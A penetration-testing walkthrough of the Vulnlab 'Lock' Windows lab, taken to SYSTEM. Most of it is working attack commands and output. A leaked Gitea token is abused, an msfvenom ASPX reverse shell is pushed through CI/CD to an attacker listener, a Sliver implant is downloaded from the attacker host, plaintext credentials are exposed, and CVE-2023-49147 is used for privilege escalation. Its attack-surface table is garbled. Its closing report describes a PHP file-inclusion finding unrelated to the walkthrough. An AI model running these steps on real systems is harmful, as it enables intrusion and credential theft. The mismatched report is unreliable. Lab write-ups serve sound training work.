🔖 Techniques & Vulnerabilities
🔍 Reconnaissance / Port Scanning
nmap scan
PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds 3000/tcp open ppp 3389/tcp open ms-wbt-server 5357/tcp open wsdapi
🎯 Attack Surface Analysis
| Port | Service | Version / Banner |
|---|---|---|
| 80/tcp | http | 445/tcp open microsoft-ds |
| 3000/tcp | ppp | 3389/tcp open ms-wbt-server |
| 5357/tcp | wsdapi | — |
80/tcpHTTP
- Content and directory discovery — hidden files, backup archives, development endpoints
- CMS/framework fingerprinting enables targeted CVE research (WordPress, Joomla, Drupal)
- SQL injection — database extraction, authentication bypass, or OS command execution
- Command injection — OS execution via unsanitised parameter handling
- Server-Side Template Injection (SSTI) — code execution through template engine abuse
- Local File Inclusion (LFI) and path traversal — sensitive file disclosure
- Server-Side Request Forgery (SSRF) — pivot to internal services and cloud metadata
- File upload abuse — filter bypass for webshell placement
- XML External Entity injection (XXE) in XML-consuming endpoints
- Authentication and session weaknesses — weak passwords, predictable tokens
3000/tcpHTTP/Grafana
- Default credential testing for Grafana and similar dashboards
- Grafana directory traversal and plugin CVE research in older versions
- API token enumeration and unauthorised data source access
5357/tcpwsdapi
- Enumerate service version for known CVEs
- Test default/weak credentials
- Review protocol-specific attack techniques
📖 Walkthrough
Reconnaissance
Port Scanning
As always xct already provided the list of ports to avoid spikes in traffic due to port scanning.
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3000/tcp open ppp
3389/tcp open ms-wbt-server
5357/tcp open wsdapiSMB Enumeration
I made a quick check on SMB but had no free access.
┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.87.100 -u '' -p '' --shares
SMB 10.10.87.100 445 LOCK [*] Windows 10.0 Build 20348 (name:LOCK) (domain:Lock) (signing:False) (SMBv1:False)
SMB 10.10.87.100 445 LOCK [-] Lock\: STATUS_ACCESS_DENIED
SMB 10.10.87.100 445 LOCK [-] Error getting user: list index out of range
SMB 10.10.87.100 445 LOCK [-] Error enumerating shares: Error occurs while reading from remote(104)┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.87.100 -u 'Guest' -p '' --shares
SMB 10.10.87.100 445 LOCK [*] Windows 10.0 Build 20348 (name:LOCK) (domain:Lock) (signing:False) (SMBv1:False)
SMB 10.10.87.100 445 LOCK [-] Lock\Guest: STATUS_ACCOUNT_DISABLEDEnumeration of Port 80/TCP
Port 80/TCP ran a random website with nothing of interest on it.
┌──(kali㉿kali)-[~]
└─$ whatweb http://10.10.87.100/
http://10.10.87.100/ [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.87.100], Lightbox, Microsoft-IIS[10.0], Script, Title[Lock - Index], X-Powered-By[ASP.NET]Enumeration of Port 3000/TCP
On port 3000/TCP I found an Gitea instance and started enumerating it.
┌──(kali㉿kali)-[~]
└─$ whatweb http://10.10.87.100:3000/
http://10.10.87.100:3000/ [200 OK] Cookies[_csrf,i_like_gitea], Country[RESERVED][ZZ], HTML5, HttpOnly[_csrf,i_like_gitea], IP[10.10.87.100], Meta-Author[Gitea - Git with a cup of tea], Open-Graph-Protocol[website], PoweredBy[Gitea], Script, Title[Gitea: Git with a cup of tea], X-Frame-Options[SAMEORIGIN]Checking the Explorer button showed the user ellen.freeman with a public repository called dev-scripts.
| Username |
|---|
| ellen.freeman |
The repository contained a python script to authenticate with Gitea and display all available repositories for the user.
As always I checked the history of the repository. There was one more commit which contained a PERSONALACCESSTOKEN.
| PERSONALACCESSTOKEN |
|---|
| 43ce39bb0bd6bc489284f2905f033ca467a6362f |
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/files]
└─$ cat repos.py
import requests
import sys
# store this in env instead at some point
PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'
def format_domain(domain):
if not domain.startswith(('http://', 'https://')):
domain = 'https://' + domain
return domain
def get_repositories(token, domain):
headers = {
'Authorization': f'token {token}'
}
url = f'{domain}/api/v1/user/repos'
response = requests.get(url, headers=headers)
if response.status_code == 200:
return response.json()
else:
raise Exception(f'Failed to retrieve repositories: {response.status_code}')
def main():
if len(sys.argv) < 2:
print("Usage: python script.py <gitea_domain>")
sys.exit(1)
gitea_domain = format_domain(sys.argv[1])
try:
repos = get_repositories(PERSONAL_ACCESS_TOKEN, gitea_domain)
print("Repositories:")
for repo in repos:
print(f"- {repo['full_name']}")
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
main()By running the version of the script from the initial commit, containing the PERSONALACCESSTOKEN, I was able to find another repository called website.
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/files]
└─$ python3 repos.py http://10.10.87.100:3000
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/websiteFoothold
I cloned the repository to see what was inside.
┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/files]
└─$ git clone http://ellen.freeman:[email protected]:3000/ellen.freeman/website.git
Cloning into 'website'...
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 1.78 MiB/s, done.
Resolving deltas: 100% (35/35), done.
Updating files: 100% (126/126), done.The readme.md pointed out that all submitted files would be automatically deployed on the webserver via Continuous Integration and Continuous Delivery (CI/CD).
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ cat readme.md
# New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserverFor the foothold I generated an aspx reverse shell using msfvenom.
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.2 LPORT=8443 -f aspx -o shell.aspx
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3396 bytes
Saved as: shell.aspxI configured the repository locally and added the file using basic git commands.
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git add .
fatal: detected dubious ownership in repository at '/media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/files/website'
To add an exception for this directory, call:
git config --global --add safe.directory /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/files/website┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git config --global --add safe.directory /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/files/website┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git config --global user.name "ellen.freeman"┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git config --global user.email [email protected]┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git commit -m "added shell.aspx"
[main d01689b] added shell.aspx
1 file changed, 45 insertions(+)
create mode 100644 shell.aspxAs last step I pushed the changed to the remote repository using the PERSONALACCESSTOKEN which I found earlier.
┌──(kali㉿kali)-[/media/…/Machines/Lock/files/website]
└─$ git push http://[email protected]:3000/ellen.freeman/website.git
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 1.42 KiB | 728.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.87.100:3000/ellen.freeman/website.git
73cdcc1..d01689b main -> mainTo trigger the payload I just had to access it using my browser.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8443
listening on [any] 8443 ...
connect to [10.8.0.2] from (UNKNOWN) [10.10.87.100] 50311
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>Persistence
I performed my basic Tactics, Techniques and Procedures (TTPs) when gaining foothold to make sure I don't kill my shell by accident.
┌──(kali㉿kali)-[~]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 20 aliases from disk
[*] Loaded 104 extension(s) from disk
██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███
▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒
░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒
▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄
▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒
▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
All hackers gain living weapon
[*] Server v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >sliver > generate --http 10.8.0.2:8888 --os windows --arch amd64 --disable-sgn --format exe --save /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/serve/sliver.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /media/sf_infosec/InfoSec/Vulnlab/Machines/Lock/serve/sliver.exesliver > http --lport 8888
[*] Starting HTTP :8888 listener ...
[*] Successfully started job #1┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Lock/serve]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...PS C:\temp> iwr 10.8.0.2:8000/sliver.exe -o sliver.exe
iwr 10.8.0.2:8000/sliver.exe -o sliver.exesliver > http --lport 8888
[*] Starting HTTP :8888 listener ...
[*] Successfully started job #1[*] Session 11a3cbbb OVERSEAS_APPEAL - 10.10.87.100:50483 (Lock) - windows/amd64 - Sat, 23 Mar 2024 06:46:00 EDTEnumeration
After completing the persistence setup I moved forward with some basic enumeration.
PS C:\> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
lock\ellen.freeman S-1-5-21-3479006486-3698385926-2473385619-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledIn C:\Users\ I found a potential target for privilege escalation called Gale Dekarios.
PS C:\Users> dir
dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/27/2023 2:00 PM .NET v4.5
d----- 12/27/2023 2:00 PM .NET v4.5 Classic
d----- 12/27/2023 12:01 PM Administrator
d----- 12/28/2023 11:36 AM ellen.freeman
d----- 12/28/2023 6:14 AM gale.dekarios
d-r--- 12/27/2023 10:21 AM Public| Username |
|---|
| gale.dekarios |
Since I only could access the home directory of the current user Ellen Freeman I took a closer look on each of his folders.
PS C:\Users\ellen.freeman> dir
dir
Directory: C:\Users\ellen.freeman
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/27/2023 11:11 AM .ssh
d-r--- 12/28/2023 5:58 AM 3D Objects
d-r--- 12/28/2023 5:58 AM Contacts
d-r--- 12/28/2023 6:11 AM Desktop
d-r--- 12/28/2023 5:59 AM Documents
d-r--- 12/28/2023 5:58 AM Downloads
d-r--- 12/28/2023 5:58 AM Favorites
d-r--- 12/28/2023 5:58 AM Links
d-r--- 12/28/2023 5:58 AM Music
d-r--- 12/28/2023 5:58 AM Pictures
d-r--- 12/28/2023 5:58 AM Saved Games
d-r--- 12/28/2023 5:58 AM Searches
d-r--- 12/28/2023 5:58 AM Videos
-a---- 12/28/2023 11:38 AM 52 .git-credentials
-a---- 12/28/2023 11:35 AM 158 .gitconfigThe file .git-credentials contained his actual credentials but they had no use at this point.
PS C:\Users\ellen.freeman> type .git-credentials
type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000| Username | Password |
|---|---|
| ellen.freeman | YWFrWJk9uButLeqx |
But the Documents folder contained a config.xml which was a configuration file for a tool called mRemoteNG.
PS C:\Users\ellen.freeman\Documents> dir
dir
Directory: C:\Users\ellen.freeman\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/28/2023 5:59 AM 3341 config.xmlPS C:\Users\ellen.freeman\Documents> type config.xml
type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==" Hostname="Lock" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>Privilege Escalation
CVE-2023-49147: PDF24 Creator 11.15.1 Local Privilege Esclation
I did some research on it and found a matching Local Privilege Escalation (LPE) on Packet Storm. Good stuff indeed.
Proof of concept:
-----------------
1) Local Privilege Escalation via MSI installer (CVE-2023-49147)
For the exploit to work, the PDF24 Creator has to be installed via the MSI file.
Afterwards, any low-privileged user can run the following command to start the
repair of PDF24 Creator and trigger the vulnerable actions without a UAC popup:
msiexec.exe /fa <PATH TO INSTALLERFILE>\pdf24-creator-11.14.0-x64.msi
At the very end of the repair process, the sub-process pdf24-PrinterInstall.exe gets called with SYSTEM privileges and performs a write action on the file
"C:\Program Files\PDF24\faxPrnInst.log". This can be used by an attacker by simply setting an oplock on the file as soon as it gets read. To do that, one can use the 'SetOpLock.exe' tool from "https://github.com/googleprojectzero/symboliclink-testing-tools"
with the following parameters:
SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
If the oplock is set, the cmd window that gets opened when pdf24-PrinterInstall.exe is executed doesn't close. The attacker can then perform the following actions to spawn a SYSTEM shell:
- right click on the top bar of the cmd window
- click on properties
- under options click on the "Legacyconsolemode" link
- open the link with a browser other than internet explorer or edge (both don't open as SYSTEM when on Win11)
- in the opened browser window press the key combination CTRL+o
- type cmd.exe in the top bar and press EnterTo start with the steps of the PoC I downloaded the mentioned tools and copied SetOpLock.exe to the box.
As first steps I set up the lock inside a cmd shell.
Next I opened another cmd shell and started the repair process.
C:\Users\gale.dekarios>msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi
In the following dialog I chose the second option which avoided a reboot at the end which was required to enter the relevant stage of the exploitation.
The repair process took some time but at the end, the cmd shell had stopped as expected.
I followed the steps and right clicked the window bar to enter the properties menu.
After clicking on the link for legacy console mode I had to chose which browser should be used for opening the link. According to the PoC I selected Firefox.
By pressing Ctrl+o a new explorer window opened in which I typed in cmd.exe to the address bar and hit enter. A new cmd shell opened with NT Authority\System privileges.
As before and for documentation purposes, I spawned another Sliver session by accessing my payload in C:\temp\.
[*] Session f3bc4aa9 OVERSEAS_APPEAL - 10.10.87.100:55775 (Lock) - windows/amd64 - Sat, 23 Mar 2024 08:09:14 EDT
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ================= =========== ==================== ========== ===================== ================== ======== ======================================= =========
f3bc4aa9 OVERSEAS_APPEAL http(s) 10.10.87.100:55775 Lock NT AUTHORITY\SYSTEM windows/amd64 en-US Sat Mar 23 08:09:17 EDT 2024 (1s ago) [ALIVE]user.txt
The user Gale Dekarios held the user.txt which I accessed via Sliver for documentation purposes.
sliver (OVERSEAS_APPEAL) > ls
C:\Users\gale.dekarios\Desktop (2 items, 318 B)
===============================================
-rw-rw-rw- desktop.ini 282 B Thu Dec 28 07:14:54 -0700 2023
-rw-rw-rw- user.txt 36 B Thu Dec 28 07:15:03 -0700 2023sliver (OVERSEAS_APPEAL) > cat user.txt
VL{REDACTED}Pivoting
While repeating the process of basic enumeration during the pivoting phase of the new user, I stumbled upon PDF24.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SecurityHealth REG_EXPAND_SZ %windir%\system32\SecurityHealthSystray.exe
VMware User Process REG_SZ "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
AzureArcSetup REG_EXPAND_SZ %windir%\AzureArcSetup\Systray\AzureArcSysTray.exe
PDF24 REG_SZ "C:\Program Files\PDF24\pdf24.exe"To dig deeper into it I moved Seatbelt to the box. Shout out to Flangvik for maintaining his amazing repository!
PS C:\temp> .\Seatbelt.exe -group=system
.\Seatbelt.exe -group=system
%&&@@@&&
&&&&&&&%%%, #&&@@@@@@%%%%%%###############%
&%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####
###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####
#####%###################### %%%.. @////(((&%%%%%%%################
&%& %%%%% Seatbelt %////(((&%%%%%%%%#############*
&%%&&&%%%%% v1.2.2 ,(((&%%%%%%%%%%%%%%%%%,
#%%%%##,====== Processes ======
Collecting Non Microsoft Processes (via WMI)
ProcessName : pdf24
ProcessId : 4940
ParentProcessId : 3636
CompanyName : geek software GmbH
Description : PDF24 Backend
Version : 11.15.1
Path : C:\Program Files\PDF24\pdf24.exe
CommandLine : "C:\Program Files\PDF24\pdf24.exe"
IsDotNet : False
ProcessProtectionInformation :====== Services ======
Non Microsoft Services (via WMI)
<--- CUT FOR BREVITY --->
Name : PDF24
DisplayName : PDF24
Description : PDF24 Printer Service
User : LocalSystem
State : Running
StartMode : Auto
Type : Own Process
ServiceCommand : "C:\Program Files\PDF24\pdf24.exe" -service
BinaryPath : C:\Program Files\PDF24\pdf24.exe
BinaryPathSDDL : O:SYD:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)(A;ID;0x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
ServiceDll :
ServiceSDDL : O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)
CompanyName : geek software GmbH
FileDescription : PDF24 Backend
Version : 11.15.1
IsDotNet : FalseSince I was not able to restart the service, I started looking for hidden files top down from the root directory of Windows which contained a hidden folder called _install.
PS C:\> GCI -hidden
GCI -hidden
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/28/2023 6:17 AM $Recycle.Bin
d--h-- 12/27/2023 12:38 PM $WinREAgent
d--hsl 12/27/2023 6:14 PM Documents and Settings
d--h-- 12/28/2023 11:24 AM ProgramData
d--hs- 12/27/2023 6:14 PM Recovery
d--hs- 12/27/2023 6:14 PM System Volume Information
d--h-- 12/28/2023 11:23 AM _install
-a-hs- 3/23/2024 2:47 AM 12288 DumpStack.log.tmp
-a-hs- 3/23/2024 2:47 AM 1207959552 pagefile.sysInside the directory I found the file pdf24-creator-11.15.1-x64.msi which was used for installing PDF24.
PS C:\_install> dir
dir
Directory: C:\_install
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/28/2023 11:21 AM 60804608 Firefox Setup 121.0.msi
-a---- 12/28/2023 5:39 AM 43593728 mRemoteNG-Installer-1.76.20.24615.msi
-a---- 12/14/2023 10:07 AM 462602240 pdf24-creator-11.15.1-x64.msiroot.txt
sliver (OVERSEAS_APPEAL) > cat C:\\Users\\Administrator\\Desktop\\root.txt
VL{REDACTED}📋 Security Assessment Report
0
Critical
1
High
0
Medium
3
Open Ports
F-001 — Local File Inclusion — Sensitive File Disclosure
7.5
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Description
During the penetration test, it was discovered that the application constructed file system paths using user-supplied parameters without adequate sanitisation or path canonicalisation. By injecting path traversal sequences into the vulnerable parameter, it was possible to traverse outside the intended directory and read arbitrary files from the server file system.
Impact
An attacker can read arbitrary files accessible to the web application process — including database credentials, application API keys, SSH private keys from user home directories, and system files such as /etc/passwd and /etc/shadow. Credentials discovered through file inclusion were used during this engagement to gain authenticated access to additional services. In PHP applications, log poisoning chains this vulnerability to full remote code execution.
Confidentiality
High
Integrity
None
Availability
None
Remediation
Validate all file path inputs by canonicalising the resolved path and verifying it begins within the expected base directory before any file operation. Implement a strict allowlist of permitted filenames where dynamic file access is required. Apply PHP open_basedir restrictions to prevent file access outside the application directory. Remove file inclusion functionality that relies on user-supplied paths and replace with explicit, hardcoded include statements.